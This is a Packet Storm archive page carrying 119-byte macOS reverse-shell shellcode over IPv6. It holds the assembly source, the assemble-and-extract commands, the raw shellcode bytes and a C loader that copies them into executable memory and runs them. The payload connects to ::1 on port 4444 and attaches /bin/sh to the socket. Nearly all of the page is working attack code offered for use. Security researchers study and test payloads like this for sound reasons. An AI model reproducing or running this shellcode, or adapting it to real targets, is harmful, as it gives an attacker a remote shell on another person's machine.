exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

macOS Reverse TCP Port 4444 IPv6 Shellcode

macOS Reverse TCP Port 4444 IPv6 Shellcode
Posted Feb 18, 2019
Authored by Ken Kitahara

119 bytes small macOS reverse shell (::1:4444/TCP) shellcode.

tags | shell, tcp, shellcode
SHA-256 | 787a14793cff4d048c9818a48103f97dbbf55a2d563e4bef9c5ca8ad60c80f67

macOS Reverse TCP Port 4444 IPv6 Shellcode

Change Mirror Download
/*
# Title: macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes)
# Date: 2019-02-17
# Tested: macOS 10.14.1
# Author: Ken Kitahara
# Compilation: gcc -o loader loader.c

dev:works devuser$ sw_vers
ProductName: Mac OS X
ProductVersion: 10.14.1
BuildVersion: 18B75
dev:works devuser$ cat ipv6rev.s
section .text
global start
start:
; socket(AF_INET6, SOCK_STREAM, IPPROTO_IP)
xor rdi, rdi
mul rdi
mov dil, 0x1e
xor rsi, rsi
mov sil, 0x1
mov al, 0x2
ror rax, 0x28
mov r8, rax
mov al, 0x61
syscall

; struct sockaddr_in6 {
; __uint8_t sin6_len;
; sa_family_t sin6_family;
; in_port_t sin6_port;
; __uint32_t sin6_flowinfo;
; struct in6_addr sin6_addr;
; __uint32_t sin6_scope_id;
; };
xor rsi, rsi
push rsi
mov rbx, 0xfeffffffffffffff
not rbx
push rbx
push rsi
mov rsi, 0xffffffffa3eee1e4
neg rsi
push rsi
push rsp
pop rsi

; connect(sockid, &sockaddr, 28)
mov rdi, rax
xor dl, 0x1c
mov rax, r8
mov al, 0x62
syscall

xor rsi, rsi
mov sil, 0x3

dup2:
; dup2(sockid, 2)
; -> dup2(sockid, 1)
; -> dup2(sockid, 0)
mov rax, r8
mov al, 0x5a
sub sil, 1
syscall
test rsi, rsi
jne dup2

; execve("//bin/sh", 0, 0)
push rsi
mov rdi, 0x68732f6e69622f2f
push rdi
push rsp
pop rdi
xor rdx, rdx
mov rax, r8
mov al, 0x3b
syscall
dev:works devuser$ nasm -f macho64 -o ipv6rev.o ipv6rev.s && ld -macosx_version_min 10.7.0 -o ipv6rev ipv6rev.o
dev:works devuser$ for i in $(objdump -d ./ipv6rev.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
\x48\x31\xff\x48\xf7\xe7\x40\xb7\x1e\x48\x31\xf6\x40\xb6\x01\xb0\x02\x48\xc1\xc8\x28\x49\x89\xc0\xb0\x61\x0f\x05\x48\x31\xf6\x56\x48\xbb\xff\xff\xff\xff\xff\xff\xff\xfe\x48\xf7\xd3\x53\x56\x48\xc7\xc6\xe4\xe1\xee\xa3\x48\xf7\xde\x56\x54\x5e\x48\x89\xc7\x80\xf2\x1c\x4c\x89\xc0\xb0\x62\x0f\x05\x48\x31\xf6\x40\xb6\x03\x4c\x89\xc0\xb0\x5a\x40\x80\xee\x01\x0f\x05\x48\x85\xf6\x75\xf0\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\x4c\x89\xc0\xb0\x3b\x0f\x05
dev:works devuser$
*/

#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>

int (*sc)();

char shellcode[] =
"\x48\x31\xff\x48\xf7\xe7\x40\xb7\x1e\x48\x31\xf6\x40\xb6\x01\xb0\x02\x48\xc1\xc8\x28\x49\x89\xc0\xb0\x61\x0f\x05\x48\x31\xf6\x56\x48\xbb\xff\xff\xff\xff\xff\xff\xff\xfe\x48\xf7\xd3\x53\x56\x48\xc7\xc6\xe4\xe1\xee\xa3\x48\xf7\xde\x56\x54\x5e\x48\x89\xc7\x80\xf2\x1c\x4c\x89\xc0\xb0\x62\x0f\x05\x48\x31\xf6\x40\xb6\x03\x4c\x89\xc0\xb0\x5a\x40\x80\xee\x01\x0f\x05\x48\x85\xf6\x75\xf0\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\x4c\x89\xc0\xb0\x3b\x0f\x05";

int main(int argc, char **argv) {
printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));

void *ptr = mmap(0, 0x22, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);

if (ptr == MAP_FAILED) {
perror("mmap");
exit(-1);
}

memcpy(ptr, shellcode, sizeof(shellcode));
sc = ptr;

sc();

return 0;
}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close